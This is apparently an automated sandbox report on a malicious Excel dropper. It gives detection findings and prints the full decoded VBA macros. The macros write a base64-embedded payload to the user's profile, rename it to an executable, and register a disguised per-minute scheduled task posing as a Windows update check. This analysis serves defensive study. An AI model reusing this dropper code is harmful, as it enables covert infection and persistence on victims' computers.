MALICIOUS
246
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is identified as a malicious Excel dropper by ClamAV. It contains Workbook_Open and Auto_Open VBA macros designed to execute upon opening. The macro attempts to create a file named 'System Manager.exe' in the user's profile directory, suggesting it downloads and executes a second-stage payload.
Heuristics 10
-
ClamAV: Xls.Dropper.Agent-7062746-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7062746-0
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly00017C37 41 inc ecx 00017C38 41 inc ecx 00017C39 41 inc ecx 00017C3A 41 inc ecx 00017C3B 41 inc ecx 00017C3C 41 inc ecx 00017C3D 41 inc ecx 00017C3E 41 inc ecx 00017C3F 41 inc ecx 00017C40 41 inc ecx 00017C41 41 inc ecx 00017C42 41 inc ecx 00017C43 41 inc ecx 00017C44 41 inc ecx 00017C45 41 inc ecx 00017C46 41 inc ecx 00017C47 41 inc ecx 00017C48 41 inc ecx 00017C49 41 inc ecx 00017C4A 41 inc ecx 00017C4B 41 inc ecx 00017C4C 41 inc ecx 00017C4D 41 inc ecx 00017C4E 41 inc ecx 00017C4F 41 inc ecx 00017C50 41 inc ecx 00017C51 41 inc ecx 00017C52 41 inc ecx 00017C53 41 inc ecx 00017C54 41 inc ecx 00017C55 41 inc ecx 00017C56 41 inc ecx 00017C57 41 inc ecx 00017C58 41 inc ecx 00017C59 41 inc ecx 00017C5A 41 inc ecx 00017C5B 41 inc ecx 00017C5C 41 inc ecx 00017C5D 41 inc ecx 00017C5E 41 inc ecx 00017C5F 41 inc ecx 00017C60 41 inc ecx 00017C61 41 inc ecx 00017C62 41 inc ecx 00017C63 41 inc ecx 00017C64 41 inc ecx 00017C65 41 inc ecx 00017C66 41 inc ecx 00017C67 41 inc ecx 00017C68 41 inc ecx 00017C69 41 inc ecx 00017C6A 41 inc ecx 00017C6B 41 inc ecx 00017C6C 41 inc ecx 00017C6D 41 inc ecx 00017C6E 41 inc ecx 00017C6F 41 inc ecx 00017C70 41 inc ecx 00017C71 41 inc ecx 00017C72 41 inc ecx 00017C73 41 inc ecx 00017C74 41 inc ecx 00017C75 41 inc ecx 00017C76 41 inc ecx 00017C77 41 inc ecx 00017C78 41 inc ecx 00017C79 41 inc ecx 00017C7A 41 inc ecx 00017C7B 41 inc ecx 00017C7C 41 inc ecx 00017C7D 41 inc ecx 00017C7E 41 inc ecx 00017C7F 41 inc ecx 00017C80 41 inc ecx 00017C81 41 inc ecx 00017C82 41 inc ecx 00017C83 41 inc ecx 00017C84 41 inc ecx 00017C85 41 inc ecx 00017C86 41 inc ecx 00017C87 41 inc ecx 00017C88 41 inc ecx 00017C89 41 inc ecx 00017C8A 41 inc ecx 00017C8B 41 inc ecx 00017C8C 41 inc ecx 00017C8D 41 inc ecx 00017C8E 41 inc ecx 00017C8F 41 inc ecx 00017C90 41 inc ecx 00017C91 41 inc ecx 00017C92 41 inc ecx 00017C93 41 inc ecx 00017C94 41 inc ecx 00017C95 41 inc ecx 00017C96 41 inc ecx
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
fn_f = "System." & "d" & "oc" Set fso = CreateObject("Scripting.FileSystemObject") If Not fso.FileExists(fp & "\" & fn) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_open() Start -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module1" Sub Auto_Open() 'MsgBox "salam" -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
If Application.MouseAvailable Then fp = "C:\Users\" & Environ("us" & "ername") & "\.template" eeee = "e" & "x" -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytes
Disassembly
Attempted x86 opcode disassembly0001782D 41 inc ecx 0001782E 41 inc ecx 0001782F 41 inc ecx 00017830 41 inc ecx 00017831 41 inc ecx 00017832 41 inc ecx 00017833 41 inc ecx 00017834 41 inc ecx 00017835 41 inc ecx 00017836 41 inc ecx 00017837 41 inc ecx 00017838 41 inc ecx 00017839 41 inc ecx 0001783A 41 inc ecx 0001783B 41 inc ecx 0001783C 41 inc ecx 0001783D 41 inc ecx 0001783E 41 inc ecx 0001783F 41 inc ecx 00017840 41 inc ecx 00017841 41 inc ecx 00017842 41 inc ecx 00017843 41 inc ecx 00017844 41 inc ecx 00017845 41 inc ecx 00017846 41 inc ecx 00017847 41 inc ecx 00017848 41 inc ecx 00017849 41 inc ecx 0001784A 41 inc ecx 0001784B 41 inc ecx 0001784C 41 inc ecx 0001784D 41 inc ecx 0001784E 41 inc ecx 0001784F 41 inc ecx 00017850 41 inc ecx 00017851 41 inc ecx 00017852 41 inc ecx 00017853 41 inc ecx 00017854 41 inc ecx 00017855 41 inc ecx 00017856 41 inc ecx 00017857 41 inc ecx 00017858 41 inc ecx 00017859 41 inc ecx 0001785A 41 inc ecx 0001785B 41 inc ecx 0001785C 45 inc ebp 0001785D 41 inc ecx 0001785E 45 inc ebp 0001785F 41 inc ecx 00017860 41 inc ecx 00017861 41 inc ecx 00017862 3466 xor al, 0x66 00017864 7567 jne 0x178cd 00017866 3441 xor al, 0x41 00017868 7441 je 0x178ab 0001786A 6e outsb dx, byte ptr [esi] 0001786B 4e dec esi 0001786C 49 dec ecx 0001786D 626742 bound esp, qword ptr [edi + 0x42] 00017870 54 push esp 00017871 4d dec ebp 00017872 306856 xor byte ptr [eax + 0x56], ch 00017875 47 inc edi 00017876 6870637942 push 0x42796370 0001787B 7763 ja 0x178e0 0001787D 6d insd dword ptr es:[edi], dx 0001787E 396e63 cmp dword ptr [esi + 0x63], ebp 00017881 6d insd dword ptr es:[edi], dx 00017882 46 inc esi 00017883 7449 je 0x178ce 00017885 47 inc edi 00017886 4e dec esi 00017887 68626d3576 push 0x76356d62 0001788C 64 .byte 0x64
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.eclipse.org/legal� In document text (OLE body)
- http://www.gnu.org/licenses/lgpl.htmlIn document text (OLE body)
- http://www.gnu.org/licenses/gpl.htmlIn document text (OLE body)
- http://www.gnu.org/licenses/agpl.htmlIn document text (OLE body)
- http://www.apache.org/licensesIn document text (OLE body)
- http://www.opensource.org/licenses/bsd-license.phpIn document text (OLE body)
- http://www.opensource.org/licenses/MIT�In document text (OLE body)
- http://www.eclipse.org/legalIn document text (OLE body)
- http://www.opensource.org/licenses/MITIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12682 bytes |
SHA-256: 3b224391d11570ec01ec5f52c31c25481de5eaa77d8175882b89e0e039861bf4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
Start
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Start2
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
'MsgBox "salam"
End Sub
Attribute VB_Name = "Module2"
Sub Start()
'Range("A1").Value = ""
'Range("B2").Value = "First Name:"
'you cant hide all sheets, at least one sheet must be visible
ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetVeryHidden
ActiveWorkbook.Save
If Application.MouseAvailable Then
fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
eeee = "e" & "x"
fn = "System Manager." & eeee & "e"
fn_f = "System." & "d" & "oc"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FileExists(fp & "\" & fn) Then
If Dir(fp, vbDirectory) = "" Then
MkDir fp
End If
b64 = uf.Lb.Caption
'important defenition for exact write
Dim res() As Byte
res = Base64Decode(b64)
'MsgBox UBound(res) - LBound(res) + 1
Dim fileNo As Integer
fileNo = FreeFile
Open fp & "\" & fn_f For Binary Lock Read Write As #fileNo
Put #fileNo, 1, res
Close #fileNo
End If
End If
End Sub
Sub Start2()
If Application.MouseAvailable Then
Set fso = CreateObject("Scripting.FileSystemObject")
fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
eeee = "e" & "x"
fn = "System Manager." & eeee & "e"
fn_f = "System." & "d" & "oc"
If fso.FileExists(fp & "\" & fn_f) And Not (fso.FileExists(fp & "\" & fn)) Then
Name fp & "\" & fn_f As fp & "\" & fn
End If
createTa
End If
End Sub
Sub createTa()
sb = "S"
sa = "edu"
sg = "ser"
sn = "v"
Set seri = CreateObject(sb & "ch" & sa & "le." & sg & sn & "ice")
Call seri.Connect
Dim rF
Set rF = seri.GetFolder("\")
Dim tD
Set tD = seri.NewTask(0)
Dim ri
Set ri = tD.RegistrationInfo
ri.Description = "Check win" & "dows upda" & "tes"
ri.Author = "Micr" & "osoft"
Dim pp
Set pp = tD.Principal
pp.LogonType = 3
' Set the task setting info for the Task Scheduler by
' creating a TaskSettings object.
With tD.settings
.Enabled = True
.runonlyifidle = False
.disallowstartifonbatteries = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
Dim a
Set a = tD.triggers
Dim t
Set tr = a.Create(1)
tr.Enabled = True
tr.ID = "" & "counter" & ""
tr.StartBoundary = XT(DateAdd("h", 0, Now()))
With tr.Repetition
.Interval = "PT1M"
.StopAtDurationEnd = False
End With
fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
eeee = "e" & "x"
fn = "System Manager." & eeee & "e"
fn_f = "System." & "d" & "oc"
Dim ac
Set ac = tD.Actions.Create(0)
ac.Path = fp & "\" & fn
Call rF.RegisterTaskDefinition("windo" & "ws update check", tD, 6, , , 3)
End Sub
Function XT(t)
Dim cS, cM, CH, cD, cMo, cY, tT, tD
cS = "0" & Second(t)
cM = "0" & Minute(t)
CH = "0" & Hour(t)
cD = "0" & Day(t)
cMo = "0" & Month(t)
cY = Year(t)
tT = Right(CH, 2) & ":" & Right(cM, 2) & _
":" & Right(cS, 2)
tD = cY & "-" & Right(cMo, 2) & "-" & Right(cD, 2)
XT = tD & "T" & tT
End Function
Sub Help()
Range("A1").Value = "hellooooo"
End Sub
Sub b64OfFile()
Dim byteArr() As Byte
Dim fileInt As Integer: fileInt = FreeFile
Open "C:\in.bin" For Binary Access Read As #fileInt
ReDim byteArr(0 To LOF(fileInt) - 1)
Get #fileInt, , byteArr
Close #fileInt
b64 = Base64Encode(byteArr)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile("C:\out.txt")
oFile.WriteLine b64
oFile.Close
Set fso = Nothing
Set oFile = Nothing
End Sub
Attribute VB_Name = "uf"
Attribute VB_Base = "0{A1099C19-8DF9-484E-93BE-340A55FC02C1}{6DFD2376-698D-4F79-812D-4876E9466868}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
End Sub
Private Sub Lb_Click()
End Sub
Attribute VB_Name = "Module3"
' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
'
' This module is multi-licensed and may be used under the terms
' of any of the following licenses:
'
' EPL, Eclipse Public License, V1.0 or later, http://www.eclipse.org/legal
' LGPL, GNU Lesser General Public License, V2.1 or later, http://www.gnu.org/licenses/lgpl.html
' GPL, GNU General Public License, V2 or later, http://www.gnu.org/licenses/gpl.html
' AGPL, GNU Affero General Public License V3 or later, http://www.gnu.org/licenses/agpl.html
' AL, Apache License, V2.0 or later, http://www.apache.org/licenses
' BSD, BSD License, http://www.opensource.org/licenses/bsd-license.php
' MIT, MIT License, http://www.opensource.org/licenses/MIT
'
' Please contact the author if you need another license.
' This module is provided "as is", without warranties of any kind.
Option Explicit
Private InitDone As Boolean
Private Map1(0 To 63) As Byte
Private Map2(0 To 127) As Byte
' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
' S a String to be encoded.
' Returns: a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
End Function
' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
' InData an array containing the data bytes to be encoded.
' Returns: a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
End Function
' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
' InData an array containing the data bytes to be encoded.
' InLen number of bytes to process in InData.
' Returns: a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
If Not InitDone Then Init
If InLen = 0 Then Base64Encode2 = "": Exit Function
Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3 ' output length without padding
Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4 ' output length including padding
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip0 As Long: ip0 = LBound(InData)
Dim ip As Long
Dim op As Long
Do While ip < InLen
Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
Dim o0 As Byte: o0 = i0 \ 4
Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
Dim o3 As Byte: o3 = i2 And &H3F
Out(op) = Map1(o0): op = op + 1
Out(op) = Map1(o1): op = op + 1
Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
Loop
Base64Encode2 = ConvertBytesToString(Out)
End Function
' Decodes a string from Base64 format.
' Parameters:
' s a Base64 String to be decoded.
' Returns a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
If s = "" Then Base64DecodeString = "": Exit Function
Base64DecodeString = ConvertBytesToString(Base64Decode(s))
End Function
' Decodes a byte array from Base64 format.
' Parameters
' s a Base64 String to be decoded.
' Returns: an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
If Not InitDone Then Init
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
Dim ILen As Long: ILen = UBound(IBuf) + 1
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
Do While ILen > 0
If IBuf(ILen - 1) <> Asc("=") Then Exit Do
ILen = ILen - 1
Loop
Dim OLen As Long: OLen = (ILen * 3) \ 4
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip As Long
Dim op As Long
Do While ip < ILen
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim b0 As Byte: b0 = Map2(i0)
Dim b1 As Byte: b1 = Map2(i1)
Dim b2 As Byte: b2 = Map2(i2)
Dim b3 As Byte: b3 = Map2(i3)
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
Out(op) = o0: op = op + 1
If op < OLen Then Out(op) = o1: op = op + 1
If op < OLen Then Out(op) = o2: op = op + 1
Loop
Base64Decode = Out
End Function
Private Sub Init()
Dim c As Integer, i As Integer
' set Map1
i = 0
For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
Map1(i) = Asc("+"): i = i + 1
Map1(i) = Asc("/"): i = i + 1
' set Map2
For i = 0 To 127: Map2(i) = 255: Next
For i = 0 To 63: Map2(Map1(i)) = i: Next
InitDone = True
End Sub
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
Dim b1() As Byte: b1 = s
Dim l As Long: l = (UBound(b1) + 1) \ 2
If l = 0 Then ConvertStringToBytes = b1: Exit Function
Dim b2() As Byte
ReDim b2(0 To l - 1) As Byte
Dim p As Long
For p = 0 To l - 1
Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
If c >= 256 Then c = Asc("?")
b2(p) = c
Next
ConvertStringToBytes = b2
End Function
Private Function ConvertBytesToString(b() As Byte) As String
Dim l As Long: l = UBound(b) - LBound(b) + 1
Dim b2() As Byte
ReDim b2(0 To (2 * l) - 1) As Byte
Dim p0 As Long: p0 = LBound(b)
Dim p As Long
For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
Dim s As String: s = b2
ConvertBytesToString = s
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.